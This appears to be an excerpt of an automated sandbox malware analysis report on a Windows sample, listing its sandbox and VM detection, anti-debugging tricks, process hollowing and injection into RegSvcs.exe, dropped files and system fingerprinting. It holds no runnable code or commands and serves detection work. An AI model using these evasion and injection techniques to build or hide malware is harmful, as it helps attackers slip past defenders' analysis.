        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Yara detected AntiVM3
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 4268, type: MEMORYSTR
        Found API chain indicative of sandbox detection
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSandbox detection routine: GetCursorPos, DecisionNode, Sleepgraph_2-88046
        Found evasive API chain (may stop execution after checking mutex)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_2-92694
        Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_2-88109
        Found stalling execution ending in API Sleep call
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeStalling execution: Execution stalls by calling Sleepgraph_2-88855
        Query firmware table information (likely to detect VMs)
        Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
        Tries to detect sandboxes / dynamic malware analysis system (registry check)
        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
        Tries to evade debugger and weak emulator (self modifying code)
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4D4A1E instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeMemory allocated: 3390000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\file.exeMemory allocated: 35C0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\file.exeMemory allocated: 33C0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
        Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
        Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetCursorPos,GetCursorPos,GetCursorPos,Sleep,GetCursorPos,Sleep,GetCursorPos,2_2_0045DB00
        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 554Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8161Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 618Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeWindow / User API: threadDelayed 9995Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-88855
        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-91584
        Source: C:\Users\user\Desktop\file.exe TID: 3684Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 1308Thread sleep count: 9995 > 30Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 1308Thread sleep time: -2248875s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_005449B0 GetSystemTime followed by cmp: cmp eax, 04h and CTI: jc 005449F1h2_2_005449B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004C6000 CreateDirectoryA,FindFirstFileA,FindNextFileA,GetLastError,FindClose,2_2_004C6000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004E6770 CreateDirectoryA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,2_2_004E6770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00493F40 SHGetFolderPathA,FindFirstFileA,FindNextFileA,FindClose,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CopyFileA,2_2_00493F40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00431F9C FindClose,FindFirstFileExW,GetLastError,2_2_00431F9C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00432022 GetLastError,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,2_2_00432022
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004938D0 FindFirstFileA,FindNextFileA,GetLastError,FindClose,2_2_004938D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004E06D0 CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey,2_2_004E06D0
        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30101Jump to behavior
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW7
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}G
        Source: RegSvcs.exe, 00000002.00000002.4088382278.00000000050D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000T
        Source: RegSvcs.exe, 00000002.00000002.4089027657.000000000517A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}sPowerS
        Source: RegSvcs.exe, 00000002.00000002.4089299029.000000000518F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: RegSvcs.exe, 00000002.00000002.4088382278.00000000050D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
        Source: RegSvcs.exe, 00000002.00000002.4086941629.0000000000D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&,
        Source: RegSvcs.exe, 00000002.00000002.4086941629.0000000000DAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0I
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: RegSvcs.exe, 00000002.00000002.4088382278.00000000050B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_AFA324F4S
        Source: RegSvcs.exe, 00000002.00000002.4088382278.00000000050FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}S-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}F8
        Source: RegSvcs.exe, 00000002.00000002.4086941629.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb
        Source: RegSvcs.exe, 00000002.00000002.4088382278.00000000050B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_AFA324F4
        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-59340
        Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Hides threads from debuggers
        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
        Tries to detect sandboxes and other dynamic analysis tools (window names)
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugObjectHandleJump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFB948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CFB948B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0045A102 CreateThread,FindCloseChangeNotification,Sleep,GetTempPathA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,OutputDebugStringA,CreateMutexA,GetLastError,Sleep,Sleep,Sleep,Sleep,shutdown,closesocket,Sleep,2_2_0045A102
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF6B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6CF6B6C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0045A102 mov eax, dword ptr fs:[00000030h]2_2_0045A102
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0045A102 mov ecx, dword ptr fs:[00000030h]2_2_0045A102
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004C86C0 mov eax, dword ptr fs:[00000030h]2_2_004C86C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0045A6B7 mov eax, dword ptr fs:[00000030h]2_2_0045A6B7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0045A6B7 mov eax, dword ptr fs:[00000030h]2_2_0045A6B7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0045A6B7 mov eax, dword ptr fs:[00000030h]2_2_0045A6B7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D3070 mov ecx, dword ptr fs:[00000030h]2_2_004D3070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004595B8 mov eax, dword ptr fs:[00000030h]2_2_004595B8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004595B8 mov eax, dword ptr fs:[00000030h]2_2_004595B8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004595B8 mov eax, dword ptr fs:[00000030h]2_2_004595B8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004595B8 mov ecx, dword ptr fs:[00000030h]2_2_004595B8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00495790 mov eax, dword ptr fs:[00000030h]2_2_00495790
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0045DB00 mov eax, dword ptr fs:[00000030h]2_2_0045DB00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0045DB00 mov eax, dword ptr fs:[00000030h]2_2_0045DB00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D6280 mov eax, dword ptr fs:[00000030h]2_2_004D6280
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004CA502 mov eax, dword ptr fs:[00000030h]2_2_004CA502
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004CA6B3 mov eax, dword ptr fs:[00000030h]2_2_004CA6B3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004C8C58 mov eax, dword ptr fs:[00000030h]2_2_004C8C58
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004C6D80 mov eax, dword ptr fs:[00000030h]2_2_004C6D80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004C8E09 mov eax, dword ptr fs:[00000030h]2_2_004C8E09
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004CB15E mov eax, dword ptr fs:[00000030h]2_2_004CB15E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004C9213 mov eax, dword ptr fs:[00000030h]2_2_004C9213
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004CB30F mov eax, dword ptr fs:[00000030h]2_2_004CB30F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004C93CB mov eax, dword ptr fs:[00000030h]2_2_004C93CB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D3600 mov eax, dword ptr fs:[00000030h]2_2_004D3600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D3600 mov eax, dword ptr fs:[00000030h]2_2_004D3600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D3600 mov eax, dword ptr fs:[00000030h]2_2_004D3600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D3600 mov eax, dword ptr fs:[00000030h]2_2_004D3600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D3600 mov eax, dword ptr fs:[00000030h]2_2_004D3600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D3600 mov eax, dword ptr fs:[00000030h]2_2_004D3600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D3600 mov eax, dword ptr fs:[00000030h]2_2_004D3600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D3600 mov eax, dword ptr fs:[00000030h]2_2_004D3600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D3600 mov eax, dword ptr fs:[00000030h]2_2_004D3600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D3600 mov eax, dword ptr fs:[00000030h]2_2_004D3600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D3600 mov eax, dword ptr fs:[00000030h]2_2_004D3600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D3600 mov eax, dword ptr fs:[00000030h]2_2_004D3600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004C9B4B mov eax, dword ptr fs:[00000030h]2_2_004C9B4B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004EEA40 CharNextA,CharNextA,CharNextA,CharNextA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrlenA,GetProcessHeap,GetProcessHeap,HeapAlloc,lstrcpynA,GetProcessHeap,HeapFree,2_2_004EEA40
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFB948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CFB948B
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFBB144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CFBB144
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00434184 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00434184
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00434311 SetUnhandledExceptionFilter,2_2_00434311
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0043451D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0043451D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00438A64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00438A64
        Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Allocates memory in foreign processes
        Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
        Contains functionality to inject threads in other processes
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004CF280 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,2_2_004CF280
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
        Sample uses process hollowing technique
        Source: C:\Users\user\Desktop\file.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000Jump to behavior
        Source: C:\Users\user\Desktop\file.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000Jump to behavior
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 55D000Jump to behavior
        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 585000Jump to behavior
        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 58A000Jump to behavior
        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 58C000Jump to behavior
        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 74E008Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe "C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe" Jump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFB84B0 cpuid 0_2_6CFB84B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey,2_2_004E06D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,2_2_00452B5A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,2_2_00452D5F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,2_2_00452E51
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,2_2_00452E06
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,2_2_00452EEC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00452F77
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,2_2_004531CA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,2_2_0044B1B1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004532F3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,2_2_004533F9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_004534CF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,2_2_0044B734
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\ VolumeInformationJump to behavior
